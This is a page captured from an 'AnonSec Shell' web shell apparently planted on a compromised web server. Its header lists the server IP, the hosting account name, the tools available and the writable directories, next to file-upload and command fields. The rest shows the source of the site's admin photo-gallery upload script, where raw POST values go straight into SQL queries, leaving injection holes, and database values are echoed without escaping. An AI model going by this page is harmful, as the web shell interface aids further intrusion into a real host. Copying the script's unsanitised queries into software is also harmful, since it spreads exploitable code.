AnonSec Shell
Server IP : 149.202.105.228  /  Your IP : 216.73.216.18
Web Server : Apache
System : Linux webm129.cluster030.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : atfycaf ( 116275)
PHP Version : 7.4.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/atfycaf/www/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/atfycaf/www/admin//galleryPhotoNew.php
<?php
$thisCheckID	= 37;
include "globalVars.php";

include "header.php";
?>

	<h2>Upload New Photos to the Gallery</h2>

<?php
if (isset($_POST["savedPhotos"])) {

	$pGalleryID		= $_POST["pGalleryID"];
	$uploadVar		= $_POST["uploadVar"];
	if ($pGalleryID == 999999) {

		$catTitle	= cleanPost($_POST["catTitle"], $conn);

		$pageURL	= str_replace($badURL, $goodURL, $catTitle);
		$pageURL	= strtolower($pageURL) ;

		$dupQuery = mysqli_query($conn, "SELECT id FROM photoGalleryCats WHERE pageURL LIKE '$pageURL%%'");
		$isDup = mysqli_num_rows($dupQuery);
		if ($isDup > 0) {
			$pageURL .= "-". ($isDup + 1);
		}

		if(!is_dir($SERVER_ROOT  ."/images/gallery/$pageURL")) {
			mkdir($SERVER_ROOT   ."/images/gallery/$pageURL");
		}

		mysqli_query($conn, "INSERT INTO photoGalleryCats (pageURL, catTitle) VALUES ('$pageURL', '". addslashes($catTitle) ."')") or die (mysqli_error($conn));
		$pGalleryID	= mysqli_insert_id($conn);

		$trackDate		= date("Y-m-d H:i:s");
		mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/galleryPhotoNew.html', 'photoGalleryCats', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; created the ". addslashes($catTitle) ." photo gallery')");

	}

	$imageFolderQuery = mysqli_query($conn, "SELECT pageURL, catTitle FROM photoGalleryCats WHERE id = '$pGalleryID'");
	while ($iFQ = mysqli_fetch_array($imageFolderQuery)) {
		$photoAlbum		= $iFQ["pageURL"];
		$catTitle		= $iFQ["catTitle"];
	}
	if(!is_dir($SERVER_ROOT  ."/images/gallery/$photoAlbum")) {
		mkdir($SERVER_ROOT   ."/images/gallery/$photoAlbum");
	}
	?>
	<p>Now you can give the uploaded photos a title. Click the Save button under the photo to save.</p>
	<div id="galleryLayout">
		<input type="hidden" id="galleryID" value="<?php echo $pGalleryID ?>">
	<?php
	$photosQuery = mysqli_query($conn, "SELECT * FROM photoGalleryTemp WHERE galleryID = '$uploadVar'") or die (mysqli_error($conn));
	while ($pQ = mysqli_fetch_array($photosQuery)) {
		$imageID	= $pQ["id"];
		$imageURL	= $pQ["imageURL"];

		/////	MOVE PHOTOS TO RELEVANT DIRECTORY AND ADD TO DATABASE - THEN DISPLAY FOR TITLE ADDITION	\\\\\
		$tempImageURL		= $SERVER_ROOT ."/images/gallery/temp/". $imageURL;
		$tempImageTitleURL	= substr_replace($tempImageURL, "-title", "-4", 0);
		$tempImageTHURL		= substr_replace($tempImageURL, "-thumb", "-4", 0);

		$newImageURL		= $SERVER_ROOT ."/images/gallery/". $photoAlbum ."/". $imageURL;
		$newImageTitleURL	= substr_replace($newImageURL, "-title", "-4", 0);
		$newImageTHURL		= substr_replace($newImageURL, "-thumb", "-4", 0);
		$imageSQL			= $photoAlbum ."/". $imageURL;

		rename($tempImageURL, $newImageURL);
		rename($tempImageTitleURL, $newImageTitleURL);
		rename($tempImageTHURL, $newImageTHURL);

		mysqli_query($conn, "DELETE FROM photoGalleryTemp WHERE id = '$imageID'");
		mysqli_query($conn, "INSERT INTO photoGallery (galleryID, imageURL) VALUES ('$pGalleryID', '$imageSQL')");
		$newImageID		= mysqli_insert_id($conn);

		$displayURL		= substr_replace($imageURL, "-thumb", "-4", 0);

		$trackDate		= date("Y-m-d H:i:s");
		mysqli_query($conn, "INSERT INTO userActions (dateCreated, adminID, pageTracking, databaseUpdated, updateDetails) VALUES ('$trackDate', '$adminID', 'admin/galleryPhotoNew.html', 'photoGalleryCats', 'The User ". addslashes($adminName) ." &lt;$adminEmail&gt; added the photo <a href=\"/images/gallery/". $imageSQL ."\" target=\"_blank\">/images/gallery/". $imageSQL ."</a> to the ". addslashes($catTitle) ." photo gallery')");
		?>
		<div class="galleryLayoutContainer">
			<div class="galleryLayoutBox">
				<div class="galleryLayoutPhoto"><img src="<?php echo $Iurl ?>gallery/<?php echo $photoAlbum ?>/<?php echo $displayURL ?>" width="300"></div>
				<div class="galleryLayoutTitle">
					<input type="text" id="photoTitle<?php echo $newImageID ?>" class="galleryPhotoTitle" placeholder="Photo Title" value="">
				</div>
				<button type="button" class="galleryLayoutSave" id="photoTitle<?php echo $newImageID ?>Save" data-pid="<?php echo $newImageID ?>" disabled>Save</button>
			</div>
		</div>
		<?php
	}
//	mysqli_query($conn, "TRUNCATE photoGalleryTemp");
	?>
	</div>

	<form action="galleryPhotoEdit.html" method="post">
		<input type="hidden" name="galleryID" value="<?php echo $pGalleryID ?>">
		<input type="submit" class="submitButton" name="getGallery" value="View Full Gallery" />
	</form>

	<?php

} else {
	if (isset($_POST["getGallery"])) {
		$pGalleryID		= $_POST["galleryID"];
		?>
	<form action="galleryPhotoEdit.html" method="post">
		<input type="hidden" name="galleryID" value="<?php echo $pGalleryID ?>">
		<input type="submit" class="submitButton" name="getGallery" value="View Existing Gallery" />
	</form>
		<?php
	}
	?>
    <form action="galleryPhotoNew.html" method="post">
		<input type="hidden" name="uploadVar" id="uploadVar" value="<?php echo getRandID(20) ?>">
		<div class="descStTab">
			<div class="pFormRow">
				<div class="pFormTitle">Gallery Category:</div>
				<div class="pFormSelect">
					<select name="pGalleryID" id="pGalleryID" required>
					<?php
					if (isset($_POST["getGallery"])) {
						$galleryCatsQuery = mysqli_query($conn, "SELECT * FROM photoGalleryCats WHERE id = '$pGalleryID'") or die (mysqli_error($conn));
						while ($gCQ = mysqli_fetch_array($galleryCatsQuery)) {
							$catID		= $gCQ["id"];
							$catTitle	= $gCQ["catTitle"];
							?>
							<option value="<?php echo $catID ?>"><?php echo $catTitle ?></option>
							<?php
						}
					} else {
						?>
						<option value="">Select</option>
						<?php
						$galleryCatsQuery = mysqli_query($conn, "SELECT * FROM photoGalleryCats ORDER BY catTitle ASC") or die (mysqli_error($conn));
						while ($gCQ = mysqli_fetch_array($galleryCatsQuery)) {
							$catID		= $gCQ["id"];
							$catTitle	= $gCQ["catTitle"];
							?>
							<option value="<?php echo $catID ?>"><?php echo $catTitle ?></option>
							<?php
						}
						?>
						<option value="999999">New Category</option>
						<?php
					}
					?>
					</select>
					<div class="pFormLabel">
						<label class="labelName">Gallery Category:</label>
					</div>
				</div>
			</div>
			<?php
			if (!isset($_POST["getGallery"])) {
				?>
			<div class="pFormRow" id="newCatRow">
				<div class="pFormTitle">New Category Title:</div>
				<div class="pFormInput">
					<input type="text" name="catTitle" size="50" />
					<div class="pFormLabel">
						<label class="labelName">New Category Title:</label>
					</div>
				</div>
			</div>
				<?php
			}
			?>
			<div id="uploadForm">
				<div class="pFormRow">
					<div class="pFormTitle">Add Photos:</div>
					<span class="btn btn-success fileinput-button">
						<span><strong>+</strong> Select photos...</span>
						<input id="fileupload" type="file" name="files[]" multiple accept="image/*">
					</span>
				</div>
				<div id="progress">
					<div class="bar" style="width: 0%;"></div>
				</div>
				<div id="status"></div>
				<ul id="galleryUpload"></ul>
			</div>
		</div>
		<input type="submit" class="submitButton" id="savedPhotos" name="savedPhotos" value="Save Photos &amp; Add Titles" disabled />
	</form>
	<div id="searchLoadingBG">
		<img src="images/searchLoading.gif" width="128" alt="Loading, Please wait..." title="Loading, Please wait...">
	</div>
	<?php
}
?>

<?php
include "footer.php";
?>

Anon7 - 2022
AnonSec Team